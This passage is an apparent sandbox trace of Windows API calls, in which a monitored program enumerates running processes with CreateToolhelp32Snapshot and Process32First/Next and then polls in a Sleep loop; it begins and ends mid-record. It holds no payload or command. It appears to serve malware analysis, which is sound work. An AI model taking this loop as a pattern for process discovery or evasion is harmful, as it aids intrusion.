th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.741] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.742] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.745] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.748] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.749] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.751] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.753] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.754] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.756] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.758] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.760] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.761] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.763] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.764] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.765] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.767] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.768] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.771] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.773] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.774] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.776] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.777] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.779] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.780] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.784] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.786] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.788] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.790] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.792] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.794] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.796] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.799] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.801] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.803] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.805] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0192.807] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0192.808] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0192.809] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0192.811] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0192.812] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0192.849] Sleep (dwMilliseconds=0x64) [0192.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.902] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.987] Sleep (dwMilliseconds=0x64) [0192.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.010] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.093] Sleep (dwMilliseconds=0x64) [0193.097] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.111] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.182] Sleep (dwMilliseconds=0x64) [0193.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.201] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.402] Sleep (dwMilliseconds=0x64) [0193.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.420] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.484] Sleep (dwMilliseconds=0x64) [0193.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.499] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.574] Sleep (dwMilliseconds=0x64) [0193.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.597] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.668] Sleep (dwMilliseconds=0x64) [0193.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.693] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.746] Sleep (dwMilliseconds=0x64) [0193.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.766] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.849] Sleep (dwMilliseconds=0x64) [0193.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0193.897] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.964] Sleep (dwMilliseconds=0x64) [0194.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.040] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.109] Sleep (dwMilliseconds=0x64) [0194.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.127] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.203] Sleep (dwMilliseconds=0x64) [0194.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.221] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.290] Sleep (dwMilliseconds=0x64) [0194.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.307] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.382] Sleep (dwMilliseconds=0x64) [0194.384] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.401] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.600] Sleep (dwMilliseconds=0x64) [0194.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.622] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.695] Sleep (dwMilliseconds=0x64) [0194.696] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.709] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.787] Sleep (dwMilliseconds=0x64) [0194.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.805] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.918] Sleep (dwMilliseconds=0x64) [0194.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0194.944] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.022] Sleep (dwMilliseconds=0x64) [0195.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.037] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.110] Sleep (dwMilliseconds=0x64) [0195.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.143] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.216] Sleep (dwMilliseconds=0x64) [0195.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.235] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.317] Sleep (dwMilliseconds=0x64) [0195.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.331] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.399] Sleep (dwMilliseconds=0x64) [0195.401] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.413] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.511] Sleep (dwMilliseconds=0x64) [0195.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.530] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.606] Sleep (dwMilliseconds=0x64) [0195.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.620] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.680] Sleep (dwMilliseconds=0x64) [0195.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.694] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.786] Sleep (dwMilliseconds=0x64) [0195.787] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.799] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.934] Sleep (dwMilliseconds=0x64) [0195.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0195.950] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.005] Sleep (dwMilliseconds=0x64) [0196.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.034] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.091] Sleep (dwMilliseconds=0x64) [0196.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.104] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: 